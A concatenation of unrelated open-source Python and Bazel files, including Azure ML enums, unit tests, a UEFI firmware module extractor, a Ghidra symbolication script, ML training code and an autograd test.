UNUSABLE = "unusable"
LEAVING = "leaving"
PREEMPTED = "preempted"
class OperationName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the last operation.
"""
CREATE = "Create"
START = "Start"
STOP = "Stop"
RESTART = "Restart"
REIMAGE = "Reimage"
DELETE = "Delete"
class OperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Operation status.
"""
IN_PROGRESS = "InProgress"
SUCCEEDED = "Succeeded"
CREATE_FAILED = "CreateFailed"
START_FAILED = "StartFailed"
STOP_FAILED = "StopFailed"
RESTART_FAILED = "RestartFailed"
REIMAGE_FAILED = "ReimageFailed"
DELETE_FAILED = "DeleteFailed"
class PrivateEndpointConnectionProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current provisioning state.
"""
SUCCEEDED = "Succeeded"
CREATING = "Creating"
DELETING = "Deleting"
FAILED = "Failed"
class PrivateEndpointServiceConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The private endpoint connection status.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
DISCONNECTED = "Disconnected"
TIMEOUT = "Timeout"
class ProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current deployment state of workspace resource. The provisioningState is to indicate states
for resource provisioning.
"""
UNKNOWN = "Unknown"
UPDATING = "Updating"
CREATING = "Creating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
class QuotaUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""An enum describing the unit of quota measurement.
"""
COUNT = "Count"
class ReasonCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The reason for the restriction.
"""
NOT_SPECIFIED = "NotSpecified"
NOT_AVAILABLE_FOR_REGION = "NotAvailableForRegion"
NOT_AVAILABLE_FOR_SUBSCRIPTION = "NotAvailableForSubscription"
class RemoteLoginPortPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh
port is closed on all nodes of the cluster. Enabled - Indicates that the public ssh port is
open on all nodes of the cluster. NotSpecified - Indicates that the public ssh port is closed
on all nodes of the cluster if VNet is defined, else is open all public nodes. It can be
default only during cluster creation time, after creation it will be either enabled or
disabled.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
NOT_SPECIFIED = "NotSpecified"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned,UserAssigned"
NONE = "None"
class SshPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh
port is closed on this instance. Enabled - Indicates that the public ssh port is open and
accessible according to the VNet/subnet policy if applicable.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class SslConfigurationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enable or disable ssl for scoring
"""
DISABLED = "Disabled"
ENABLED = "Enabled"
class Status(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Status of update workspace quota.
"""
UNDEFINED = "Undefined"
SUCCESS = "Success"
FAILURE = "Failure"
INVALID_QUOTA_BELOW_CLUSTER_MINIMUM = "InvalidQuotaBelowClusterMinimum"
INVALID_QUOTA_EXCEEDS_SUBSCRIPTION_LIMIT = "InvalidQuotaExceedsSubscriptionLimit"
INVALID_VM_FAMILY_NAME = "InvalidVMFamilyName"
OPERATION_NOT_SUPPORTED_FOR_SKU = "OperationNotSupportedForSku"
OPERATION_NOT_ENABLED_FOR_REGION = "OperationNotEnabledForRegion"
class UnderlyingResourceAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DELETE = "Delete"
DETACH = "Detach"
class UnitOfMeasure(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The unit of time measurement for the specified VM price. Example: OneHour
"""
ONE_HOUR = "OneHour"
class UsageUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""An enum describing the unit of usage measurement.
"""
COUNT = "Count"
class VMPriceOSType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Operating system type used by the VM.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class VmPriority(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Virtual Machine priority
"""
DEDICATED = "Dedicated"
LOW_PRIORITY = "LowPriority"
class VMTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of the VM.
"""
STANDARD = "Standard"
LOW_PRIORITY = "LowPriority"
SPOT = "Spot"
|
Packs/SecurityAdvisor/Integrations/SecurityAdvisor/SecurityAdvisor_test.py | diCagri/content | 799 | 12799252 | <reponame>diCagri/content<filename>Packs/SecurityAdvisor/Integrations/SecurityAdvisor/SecurityAdvisor_test.py
import SecurityAdvisor
URL_SUFFIX = 'apis/coachuser/'
BASE_URL = 'https://www.securityadvisor.io/'
CONTEXT_JSON = {
"SecurityAdvisor.CoachUser": {
"coaching_date": "2019-10-04T21:04:19.480425",
"coaching_status": "Pending",
"coaching_score": "",
"user": "<EMAIL>",
"context": "phishing",
"message": "Coaching Sent"
}
}
RESPONSE_JSON = {
"coaching_date": "2019-10-04T21:04:19.480425",
"coaching_status": "Pending",
"coaching_score": "",
"user": "<EMAIL>",
"context": "phishing",
"message": "Coaching Sent"
}
HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'Token ' + '<PASSWORD>'
}
def test_coach_end_user_command(requests_mock):
"""Unit test for coach-end-user command
Args:
        requests_mock: requests-mock pytest fixture used to stub the HTTP POST
"""
    mock_response = RESPONSE_JSON
    requests_mock.post(BASE_URL + URL_SUFFIX, json=mock_response)
client = SecurityAdvisor.Client(
base_url=BASE_URL,
verify=False,
proxy=False,
headers=HEADERS
)
args = {"user": "<EMAIL>", "context": "phishing"}
_, _, result = SecurityAdvisor.coach_end_user_command(client, args)
assert result == RESPONSE_JSON
def test_module_command(requests_mock):
"""Unit test for test-module command
Args:
        requests_mock: requests-mock pytest fixture used to stub the HTTP POST
"""
    mock_response = RESPONSE_JSON
    requests_mock.post(BASE_URL + URL_SUFFIX, json=mock_response)
client = SecurityAdvisor.Client(
base_url=BASE_URL,
verify=False,
proxy=False,
headers=HEADERS
)
response = SecurityAdvisor.test_module(client)
assert response == "ok"
|
python/py_gapic_repositories.bzl | vam-google/rules_gapic | 239 | 12799263 | <filename>python/py_gapic_repositories.bzl<gh_stars>100-1000
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
_BLACK_PY_BUILD_FILE = """
py_binary(
name = "black",
srcs = glob(["**/*.py"]),
visibility = ["//visibility:public"],
)
"""
def py_gapic_repositories():
_maybe(
http_archive,
name = "pypi_black",
strip_prefix = "black-19.3b0",
urls = ["https://files.pythonhosted.org/packages/89/07/aebb10fb8f2ffbac672dfbebffa724643bc84cf012a57737a622d1dabddb/black-19.3b0.tar.gz"],
build_file_content = _BLACK_PY_BUILD_FILE,
)
def _maybe(repo_rule, name, strip_repo_prefix = "", **kwargs):
if not name.startswith(strip_repo_prefix):
return
repo_name = name[len(strip_repo_prefix):]
if repo_name in native.existing_rules():
return
repo_rule(name = repo_name, **kwargs)
|
jsymbols.py | agnosticlines/ghidra_kernelcache | 238 | 12799275 | # Symbolicate the kernelcache from jtool2
#@author simo
#@category iOS.kernel
from utils.methods import *
if __name__ == "__main__":
default_file = "test"
fname = askString("Kernelcache symbol file","Symbol file: ",default_file)
f = open(fname,"rb+")
buf = f.read().split('\n')
i = 0
for line in buf:
if len(line) == 0:
continue
addr , symbol , empty = line.split("|")
if len(symbol) == 0:
continue
if "func_" in symbol:
continue
print addr,symbol
symbol = symbol.strip()#.replace(" ","_")
symbolicate(addr,symbol)
i+= 1
|
tools/get_efi_images.py | fengjixuchui/UEFI_RETool | 240 | 12799312 | <filename>tools/get_efi_images.py<gh_stars>100-1000
# SPDX-License-Identifier: MIT
import glob
import os
import pathlib
import re
import shutil
import colorama
import uefi_firmware
from .guid_db import UEFI_GUIDS
DIR_NAME = "all"
PE_DIR = "modules"
g_re_guid = re.compile(
r"file-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
)
class Dumper:
def __init__(self, fw_name, dir_name, pe_dir):
self.fw_name = fw_name
self.dir_name = dir_name
self.pe_dir = pe_dir
self.modules = list()
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
if not os.path.isdir(self.pe_dir):
os.mkdir(self.pe_dir)
@staticmethod
def _unsupported() -> bool:
print("[-] This type of binary is not supported")
return False
def get_unique_name(self, module_name: str) -> str:
# Get unique name, see https://github.com/binarly-io/efiXplorer/issues/11
index = 1
unique_name = module_name
while True:
if unique_name in self.modules:
unique_name = f"{module_name}_{index:#d}"
index += 1
continue
return unique_name
def get_module_name(self, module_path: str) -> str:
module_name = str()
dir_name, _ = os.path.split(module_path)
template = os.path.join(dir_name, "*.ui")
if len(glob.glob(template)) == 1:
# try to get a friendly name from the *.ui file
ui_path = glob.glob(template)[0]
with open(ui_path, "rb") as f:
module_name = f.read()
module_name = module_name.decode("utf-16le")
module_name = self.get_unique_name(module_name[:-1])
self.modules.append(module_name)
return module_name
# no UI section, try to get a friendly name from the GUID database
file_guids = g_re_guid.findall(dir_name)
if not file_guids:
return str()
module_guid = file_guids[-1].replace("file-", "")
module_name = UEFI_GUIDS.get(module_guid.upper())
if not module_name:
module_name = module_guid
module_name = self.get_unique_name(module_name)
self.modules.append(module_name)
return module_name
@staticmethod
def search_pe(d: str) -> list:
return list(map(str, pathlib.Path(d).rglob("*.pe")))
@staticmethod
def search_te(d: str) -> list:
return list(map(str, pathlib.Path(d).rglob("*.te")))
def get_pe_files(self):
pe_files = self.search_pe(self.dir_name)
te_files = self.search_te(self.dir_name)
for module_path in te_files + pe_files:
module_name = self.get_module_name(module_path)
if not module_name:
print(f"Current module: unknown")
continue
print(f"Current module: {module_name}")
dst = os.path.join(self.pe_dir, module_name)
shutil.copy(module_path, dst)
def dump_all(self) -> bool:
if not os.path.isfile(self.fw_name):
print(f"[-] Check {self.fw_name} file")
return False
with open(self.fw_name, "rb") as fw:
file_content = fw.read()
parser = uefi_firmware.AutoParser(file_content)
if parser.type() is "unknown":
fvh_index = file_content.find(b"_FVH")
if fvh_index < 0:
return self._unsupported()
parser = uefi_firmware.AutoParser(file_content[fvh_index - 40 :])
if parser.type() is "unknown":
return self._unsupported()
firmware = parser.parse()
firmware.dump(self.dir_name)
return True
def get_efi_images(fw_name) -> bool:
"""get images from firmware"""
colorama.init(autoreset=True) # for correct color display in uefi_firmware module
dumper = Dumper(fw_name, DIR_NAME, PE_DIR)
if not dumper.dump_all():
exit()
dumper.get_pe_files()
return True
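# Rough usage sketch (hedged: this module uses package-relative imports such as
# .guid_db, so it is normally invoked through the package rather than run
# directly; "fw.bin" is a placeholder path to a UEFI firmware image):
#
#   from tools.get_efi_images import get_efi_images
#   get_efi_images("fw.bin")  # volumes land in ./all, PE/TE modules in ./modules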
|
testYOLOv3.py | SuicideMonkey/Object-Detection-API-Tensorflow | 303 | 12799373 | <filename>testYOLOv3.py
import tensorflow as tf
import numpy as np
import os
import utils.tfrecord_voc_utils as voc_utils
import YOLOv3 as yolov3
# import matplotlib.pyplot as plt
# import matplotlib.patches as patches
# from skimage import io, transform
from utils.voc_classname_encoder import classname_to_ids
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
lr = 0.001
batch_size = 12
buffer_size = 256
epochs = 160
reduce_lr_epoch = []
config = {
'mode': 'train', # 'train', 'test'
'data_shape': [448, 448, 3],
'num_classes': 20,
'weight_decay': 5e-4,
'keep_prob': 0.5, # not used
'data_format': 'channels_last', # 'channels_last' 'channels_first'
'batch_size': batch_size,
'coord_scale': 1,
'noobj_scale': 1,
'obj_scale': 5.,
'class_scale': 1.,
'num_priors': 3,
'nms_score_threshold': 0.5,
'nms_max_boxes': 10,
'nms_iou_threshold': 0.5,
'priors': [[[10., 13.], [16, 30.], [33., 23.]],
[[30., 61.], [62., 45.], [59., 119.]],
[[116., 90.], [156., 198.], [373.,326.]]]
}
image_augmentor_config = {
'data_format': 'channels_last',
'output_shape': [448, 448],
# 'zoom_size': [520, 520],
# 'crop_method': 'random',
'flip_prob': [0., 0.5],
'fill_mode': 'BILINEAR',
'keep_aspect_ratios': False,
'constant_values': 0.,
# 'color_jitter_prob': 0.5,
# 'rotate': [0.5, -10., 10.],
'pad_truth_to': 60,
}
data = os.listdir('./voc2007/')
data = [os.path.join('./voc2007/', name) for name in data]
train_gen = voc_utils.get_generator(data,
batch_size, buffer_size, image_augmentor_config)
trainset_provider = {
'data_shape': [448, 448, 3],
'num_train': 5011,
'num_val': 0, # not used
'train_generator': train_gen,
'val_generator': None # not used
}
testnet = yolov3.YOLOv3(config, trainset_provider)
testnet.load_weight('./weight/test-40449')
for i in range(epochs):
print('-'*25, 'epoch', i, '-'*25)
if i in reduce_lr_epoch:
lr = lr/10.
print('reduce lr, lr=', lr, 'now')
mean_loss = testnet.train_one_epoch(lr)
print('>> mean loss', mean_loss)
testnet.save_weight('latest', './weight/test') # 'latest', 'best'
# img = io.imread()
# img = transform.resize(img, [448,448])
# img = np.expand_dims(img, 0)
# result = testnet.test_one_image(img)
# id_to_clasname = {k:v for (v,k) in classname_to_ids.items()}
# scores = result[0]
# bbox = result[1]
# class_id = result[2]
# print(scores, bbox, class_id)
# plt.figure(1)
# plt.imshow(np.squeeze(img))
# axis = plt.gca()
# for i in range(len(scores)):
# rect = patches.Rectangle((bbox[i][1],bbox[i][0]), bbox[i][3]-bbox[i][1],bbox[i][2]-bbox[i][0],linewidth=2,edgecolor='b',facecolor='none')
# axis.add_patch(rect)
# plt.text(bbox[i][1],bbox[i][0], id_to_clasname[class_id[i]]+str(' ')+str(scores[i]), color='red', fontsize=12)
# plt.show()
|
deepy/layers/word_embed.py | uaca/deepy | 260 | 12799377 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import theano
import theano.tensor as T
from deepy.layers import NeuralLayer
class WordEmbedding(NeuralLayer):
"""
Word embedding layer.
    The word embeddings are randomly initialized and are learned over time.
"""
def __init__(self, size, vocab_size, zero_index=None, mask=None, load_values=None, init=None):
from deepy.core.neural_var import NeuralVariable
super(WordEmbedding, self).__init__("word_embed")
self.size = size
self.vocab_size = vocab_size
self.output_dim = size
self.zero_index = zero_index
self._mask = mask.tensor if type(mask) == NeuralVariable else mask
self._init = init
self._load_values = load_values
self.init(1)
def prepare(self):
if self._load_values is not None:
self.embed_matrix = theano.shared(self._load_values, name="embeddings")
else:
self.embed_matrix = self.create_weight(self.vocab_size, self.size, "embeddings", initializer=self._init)
self.register_parameters(self.embed_matrix)
def compute_tensor(self, x, mask=None):
mask = mask if mask else self._mask
if self.zero_index is not None:
mask = T.neq(x, self.zero_index)
# To avoid negative index
x = T.cast(x * mask, "int32")
if x.ndim == 1:
ret_tensor = self.embed_matrix[x]
else:
ret_tensor = self.embed_matrix[x.flatten()].reshape(list(x.shape) + [self.size])
if mask:
if x.ndim == 2:
ret_tensor *= mask[:, :, None]
elif x.ndim == 1:
ret_tensor *= mask[:, None]
return ret_tensor
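# Minimal usage sketch (assumptions: the layer sizes below are arbitrary
# illustration values and the surrounding deepy graph API supplies the integer
# word-id tensor; this is not taken from the library's documentation):
#
#   embed = WordEmbedding(size=128, vocab_size=10000, zero_index=0)
#   # feeding a (batch, time) int matrix through the layer yields
#   # (batch, time, 128) embeddings, with padding positions zeroed out.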
|
tests/scripts/unicode💩.py | benfred/py-spy | 8,112 | 12799421 | <filename>tests/scripts/unicode💩.py<gh_stars>1000+
#!/env/bin/python
# -*- coding: utf-8 -*-
import time
def function1(seconds):
time.sleep(seconds)
if __name__ == "__main__":
function1(100)
|
mmdeploy/codebase/mmocr/models/text_recognition/sar_encoder.py | zhiqwang/mmdeploy | 746 | 12799438 | # Copyright (c) OpenMMLab. All rights reserved.
import mmocr.utils as utils
import torch
import torch.nn.functional as F
from mmdeploy.core import FUNCTION_REWRITER
@FUNCTION_REWRITER.register_rewriter(
func_name='mmocr.models.textrecog.encoders.SAREncoder.forward',
backend='default')
def sar_encoder__forward(ctx, self, feat, img_metas=None):
"""Rewrite `forward` of SAREncoder for default backend.
Rewrite this function to:
1. convert tuple value of feat.size to int, making model exportable.
2. use torch.ceil to replace original math.ceil and if else in mmocr.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the class SAREncoder.
feat (Tensor): Encoded feature map of shape (N, C, H, W).
img_metas (Optional[list[dict]]): A list of image info dict where each
dict has: 'img_shape', 'scale_factor', 'flip', and may also contain
'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'.
For details on the values of these keys, see
:class:`mmdet.datasets.pipelines.Collect`.
Returns:
holistic_feat (Tensor): A feature map output from SAREncoder. The shape
[N, M].
"""
if img_metas is not None:
assert utils.is_type_list(img_metas, dict)
assert len(img_metas) == feat.size(0)
valid_ratios = None
if img_metas is not None:
valid_ratios = [
img_meta.get('valid_ratio', 1.0) for img_meta in img_metas
] if self.mask else None
h_feat = int(feat.size(2))
feat_v = F.max_pool2d(feat, kernel_size=(h_feat, 1), stride=1, padding=0)
feat_v = feat_v.squeeze(2) # bsz * C * W
feat_v = feat_v.permute(0, 2, 1).contiguous() # bsz * W * C
holistic_feat = self.rnn_encoder(feat_v)[0] # bsz * T * C
if valid_ratios is not None:
valid_hf = []
T = holistic_feat.size(1)
for i, valid_ratio in enumerate(valid_ratios):
# use torch.ceil to replace original math.ceil and if else in mmocr
valid_step = torch.ceil(T * valid_ratio).long() - 1
valid_hf.append(holistic_feat[i, valid_step, :])
valid_hf = torch.stack(valid_hf, dim=0)
else:
valid_hf = holistic_feat[:, -1, :] # bsz * C
holistic_feat = self.linear(valid_hf) # bsz * C
return holistic_feat
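# Added note (based on how other rewriters in this repository are used): the
# @FUNCTION_REWRITER.register_rewriter decorator above patches
# SAREncoder.forward with this function while mmdeploy's rewrite context is
# active during export; user code never calls sar_encoder__forward directly.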
|
chronologer/vega.py | dandavison/chronologer | 165 | 12799453 | import json
import os
from jinja2 import Template
from chronologer.config import config
def write_html():
html_file = os.path.join(os.path.dirname(__file__), "templates", "index.html")
with open(html_file) as fp:
html_template = Template(fp.read())
if not config.dry_run:
boxplot_spec = json.dumps(_get_boxplot_spec(), indent=2)
with open(config.html_output_file, "w") as fp:
fp.write(html_template.render(boxplot_spec=boxplot_spec))
def _get_boxplot_spec():
with open(config.combined_benchmark_file) as fp:
values = json.load(fp)
return {
"$schema": "https://vega.github.io/schema/vega-lite/v3.json",
"data": {"values": values},
"mark": {"type": "boxplot", "extent": "min-max", "size": 5},
"width": 1400,
"height": 500,
"encoding": {
"y": {"field": "time", "type": "quantitative", "axis": {"title": "Time"}},
"x": {
"field": "commit",
"type": "ordinal",
"axis": {"title": "Commit", "labels": False, "ticks": False},
},
"tooltip": {"field": "message", "type": "ordinal", "aggregate": "min"},
},
}
|
src/googleapis/codegen/filesys/package_writer_foundry.py | aiuto/google-apis-client-generator | 178 | 12799463 | <reponame>aiuto/google-apis-client-generator
#!/usr/bin/python2.7
"""Foundary for getting a package writer."""
from googleapis.codegen.filesys import filesystem_library_package
from googleapis.codegen.filesys import single_file_library_package
from googleapis.codegen.filesys import tar_library_package
from googleapis.codegen.filesys import zip_library_package
def GetPackageWriter(output_dir=None, output_file=None, output_format='zip'):
"""Get an output writer for a package."""
if not (output_dir or output_file):
raise ValueError(
'GetPackageWriter requires either output_dir or output_file')
if output_dir and output_file:
raise ValueError(
'GetPackageWriter requires only one of output_dir or output_file')
if output_dir:
package_writer = filesystem_library_package.FilesystemLibraryPackage(
output_dir)
else:
out = open(output_file, 'w')
if output_format == 'tgz':
package_writer = tar_library_package.TarLibraryPackage(out)
elif output_format == 'tar':
package_writer = tar_library_package.TarLibraryPackage(out,
compress=False)
elif output_format == 'txt':
package_writer = single_file_library_package.SingleFileLibraryPackage(out)
else:
package_writer = zip_library_package.ZipLibraryPackage(out)
return package_writer
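# Example calls (illustrative; file and directory names are placeholders):
#
#   writer = GetPackageWriter(output_file='client_lib.tgz', output_format='tgz')
#   writer = GetPackageWriter(output_dir='/tmp/generated_lib')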
|
bindings/python/examples/mouse_game.py | augustye/muniverse | 380 | 12799492 | <filename>bindings/python/examples/mouse_game.py
"""
Simple program to demonstrate how to use muniverse on a
game that takes mouse events.
"""
import sys
import numpy as np
sys.path.insert(0, '..')
import muniverse # noqa: E402
def main():
print('Looking up environment...')
spec = muniverse.spec_for_name('TowerMania-v1')
print('Creating environment...')
env = muniverse.Env(spec)
try:
print('Resetting environment...')
env.reset()
print('Getting observation...')
obs = env.observe()
print(ascii_art(obs))
print('Playing game...')
step_idx = 0
action = muniverse.MouseAction('mousePressed', x=100, y=100, click_count=1)
actions = [action, action.with_event('mouseReleased')]
while True:
reward, done = env.step(0.1, actions[step_idx % 2])
step_idx += 1
print('reward: ' + str(reward))
if done:
break
finally:
env.close()
def ascii_art(img):
brightness = np.sum(img, axis=2) / 3
downsampled = brightness[::14, ::7]
binary = downsampled > 128
height, width = binary.shape
res = ''
for y in range(0, height):
if res != '':
res += '\n'
for x in range(0, width):
if binary[y, x]:
res += 'X'
else:
res += ' '
return res
if __name__ == '__main__':
main()
|
pyani/aniblastall.py | widdowquinn/pyani | 144 | 12799493 | # -*- coding: utf-8 -*-
# (c) University of Strathclyde 2021
# Author: <NAME>
#
# Contact: <EMAIL>
#
# <NAME>,
# Strathclyde Institute for Pharmacy and Biomedical Sciences,
# Cathedral Street,
# Glasgow,
# G4 0RE
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2021 University of Strathclyde
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Code to implement the ANIblastall average nucleotide identity method."""
import logging
import os
import platform
import re
import shutil
import subprocess
from pathlib import Path
from . import pyani_config
from . import PyaniException
class PyaniblastallException(PyaniException):
"""ANIblastall-specific exception for pyani."""
def get_version(blast_exe: Path = pyani_config.BLASTALL_DEFAULT) -> str:
r"""Return BLAST blastall version as a string.
:param blast_exe: path to blastall executable
We expect blastall to return a string as, for example
.. code-block:: bash
$ blastall -version
[blastall 2.2.26] ERROR: Number of database sequences to show \
one-line descriptions for (V) [ersion] is bad or out of range [? to ?]
This is concatenated with the OS name.
The following circumstances are explicitly reported as strings
- no executable at passed path
- non-executable file at passed path (this includes cases where the user doesn't have execute permissions on the file)
- no version info returned
- executable cannot be run on this OS
"""
logger = logging.getLogger(__name__)
try:
blastall_path = Path(shutil.which(blast_exe)) # type:ignore
except TypeError:
return f"{blast_exe} is not found in $PATH"
if not blastall_path.is_file(): # no executable
return f"No blastall at {blastall_path}"
# This should catch cases when the file can't be executed by the user
if not os.access(blastall_path, os.X_OK): # file exists but not executable
return f"blastall exists at {blastall_path} but not executable"
if platform.system() == "Darwin":
cmdline = [blast_exe, "-version"]
else:
cmdline = [blast_exe]
try:
result = subprocess.run(
cmdline, # type: ignore
shell=False,
stdout=subprocess.PIPE, # type: ignore
stderr=subprocess.PIPE,
check=False, # blastall doesn't return 0
)
except OSError:
logger.warning("blastall executable will not run", exc_info=True)
return f"blastall exists at {blastall_path} but could not be executed"
version = re.search( # type: ignore
r"(?<=blastall\s)[0-9\.]*", str(result.stderr, "utf-8")
).group()
if 0 == len(version.strip()):
return f"blastall exists at {blastall_path} but could not retrieve version"
return f"{platform.system()}_{version} ({blastall_path})"
|
vespene/migrations/0009_remove_workerpool_sudo_password.py | vespene-io/vespene | 680 | 12799528 | # Generated by Django 2.1.2 on 2018-12-16 13:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vespene', '0008_auto_20181106_2233'),
]
operations = [
migrations.RemoveField(
model_name='workerpool',
name='sudo_password',
),
]
|
doc/autosar4_api/examples/create_composition_component.py | SHolzmann/autosar | 199 | 12799544 | import autosar
ws = autosar.workspace("4.2.2")
components = ws.createPackage("ComponentTypes")
swc = components.createCompositionComponent("MyComposition")
print(swc.name)
|
tests/test_actions.py | pauloromeira/onegram | 150 | 12799577 | import pytest
from onegram.exceptions import NotSupportedError
from onegram import follow, unfollow
from onegram import like, unlike
from onegram import comment, uncomment
from onegram import save, unsave
def test_follow(logged, user, cassette):
if logged:
response = follow(user)
assert response == {'result': 'following',
'status': 'ok',
'user_id': user['id']}
response = unfollow(user)
assert response == {'status': 'ok', 'user_id': user['id']}
else:
with pytest.raises(NotSupportedError):
follow(user)
with pytest.raises(NotSupportedError):
unfollow(user)
def test_like(logged, post, cassette):
if logged:
response = like(post)
assert response == {'status': 'ok', 'post_id': post['id']}
response = unlike(post)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
like(post)
with pytest.raises(NotSupportedError):
unlike(post)
def test_comment(logged, post, cassette):
text = 'awesome!'
if logged:
commentary = comment(text, post)
assert commentary['id']
assert commentary['text'] == text
assert commentary['status'] == 'ok'
assert commentary['post_id'] == post['id']
response = uncomment(commentary)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
comment(text, post)
with pytest.raises(NotSupportedError):
fake_comment = {'id': '1', 'post_id': '2'}
uncomment(fake_comment)
def test_save(logged, post, cassette):
if logged:
response = save(post)
assert response == {'status': 'ok', 'post_id': post['id']}
response = unsave(post)
assert response == {'status': 'ok', 'post_id': post['id']}
else:
with pytest.raises(NotSupportedError):
save(post)
with pytest.raises(NotSupportedError):
unsave(post)
|
tests/unittest/test_autograd.py | yuhonghong66/minpy | 1,271 | 12799585 | from __future__ import print_function
import minpy.numpy as mp
import numpy as np
import minpy.dispatch.policy as policy
from minpy.core import convert_args, return_numpy, grad_and_loss, grad, minpy_to_numpy as mn, numpy_to_minpy as nm
import time
# mp.set_policy(policy.OnlyNumPyPolicy())
def test_autograd():
@convert_args
def minpy_rnn_step_forward(x, prev_h, Wx, Wh, b):
next_h = mp.tanh(x.dot(Wx) + prev_h.dot(Wh) + b)
return next_h
def rel_error(x, y):
""" returns relative error """
return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y))))
def rnn_step_forward(x, prev_h, Wx, Wh, b):
next_h = np.tanh(prev_h.dot(Wh) + x.dot(Wx) + b)
cache = next_h, prev_h, x, Wx, Wh
return next_h, cache
def rnn_step_backward(dnext_h, cache):
dx, dprev_h, dWx, dWh, db = None, None, None, None, None
# Load values from rnn_step_forward
next_h, prev_h, x, Wx, Wh = cache
# Gradients of loss wrt tanh
dtanh = dnext_h * (1 - next_h * next_h) # (N, H)
# Gradients of loss wrt x
dx = dtanh.dot(Wx.T)
# Gradients of loss wrt prev_h
dprev_h = dtanh.dot(Wh.T)
# Gradients of loss wrt Wx
dWx = x.T.dot(dtanh) # (D, H)
# Gradients of loss wrt Wh
dWh = prev_h.T.dot(dtanh)
# Gradients of loss wrt b. Note we broadcast b in practice. Thus result of
# matrix ops are just sum over columns
db = dtanh.sum(axis=0) # == np.ones([N, 1]).T.dot(dtanh)[0, :]
return dx, dprev_h, dWx, dWh, db
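    # Added note, a worked check of the backward pass above: with
    # next_h = tanh(a) and a = x.dot(Wx) + prev_h.dot(Wh) + b, the chain rule
    # gives d(next_h)/da = 1 - tanh(a)**2 = 1 - next_h**2, so
    # dtanh = dnext_h * (1 - next_h * next_h), and each gradient (dx, dprev_h,
    # dWx, dWh, db) is dtanh multiplied into the corresponding factor of a.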
# preparation
N, D, H = 4, 5, 6
x = np.random.randn(N, D)
h = np.random.randn(N, H)
Wx = np.random.randn(D, H)
Wh = np.random.randn(H, H)
b = np.random.randn(H)
out, cache = rnn_step_forward(x, h, Wx, Wh, b)
dnext_h = np.random.randn(*out.shape)
# test MinPy
start = time.time()
rnn_step_forward_loss = lambda x, h, Wx, Wh, b, dnext_h: minpy_rnn_step_forward(x, h, Wx, Wh, b) * nm(dnext_h)
grad_loss_function = return_numpy(grad_and_loss(rnn_step_forward_loss, range(5)))
grad_arrays = grad_loss_function(x, h, Wx, Wh, b, dnext_h)[0]
end = time.time()
print("MinPy total time elapsed:", end - start)
